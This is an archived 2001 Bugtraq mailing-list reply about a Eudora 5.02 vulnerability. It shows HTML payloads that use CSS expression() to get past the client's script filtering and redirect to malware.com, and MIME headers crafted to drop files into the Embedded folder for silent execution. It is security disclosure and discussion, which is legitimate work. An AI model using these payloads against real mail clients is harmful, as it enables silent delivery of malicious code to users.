Bugtraq mailing list archives
Re: feeble.you!dora.exploit
From: "http-equiv () excite com" <http-equiv () excite com>
Date: Tue, 20 Mar 2001 11:23:48 -0800
|Jeff Beckley wrote: | |At 01:38 AM 3/18/2001 -0800, http-equiv () excite com wrote: |>Silent delivery and installation of an executable on a target |>computer. No client input other than opening an email using Eudora |>5.02 - Sponsored Mode provided 'use Microsoft viewer' and 'allow |>executables in HTML content' are enabled. | |The "Allow executables in HTML content" setting is turned off by |default. The online help and user manual mention that the setting |should remain off for security reasons. This of course is 100% correct. Unfortunately on closer examination we find that this too can be defeated quite easily. Consider the following non-JavaScript: <!doctype html public "-//w3c//dtd html 4.0 transitional//en"> <img SRC="file://C:\WINDOWS\APPLIC~1\QUALCOMM\EUDORA\Embedded\malware.gif" height=2 width=2 STYLE="left:expression(location.href='http://www.malware.com');"></html> <br> <br> </body></html> This slips through, with "Allow executables in HTML content" disabled. therefore the results will be the same: <img SRC="" height=1 width=1 STYLE="left:expression(malware.location.href='cid:malware.com');"></ ...etc Disable the 'Microsoft Viewer" thing. That's the problem. A good repair can be by reviewing all the necessary tricks to inject JavaScript into Hotmail Accounts. These are well documented here and dating back for quite some time. It appears the mail client seeks typical script tags, which is defeated as above. Additional you might want to not allow a crafted inline file to transfer automatically to your embedded folder: Content-Type: application/octet-stream; charset=iso-8859-1 Content-ID: <malware.com> Content-Transfer-Encoding: base64 Content-Disposition: inline; filename="You!DORA.html" We note that if the content-type is manipulated we can route the file to the 'Embedded' folder. Casual observation suggests image files and *.exe are routed there. While *.html is not, hence the constructed Content-Type: application/octet-stream; charset=iso-8859-1 while the file is: Content-Disposition: inline; filename="You!DORA.html" --- http://www.malware.com _______________________________________________________ Send a cool gift with your E-Card http://www.bluemountain.com/giftcenter/
Current thread:
- feeble.you!dora.exploit http-equiv () excite com (Mar 19)
- Re: feeble.you!dora.exploit Jeff Beckley (Mar 20)
- <Possible follow-ups>
- Re: feeble.you!dora.exploit http-equiv () excite com (Mar 21)
- Re: feeble.you!dora.exploit http-equiv () excite com (Mar 21)
- Re: feeble.you!dora.exploit Jeff Beckley (Mar 22)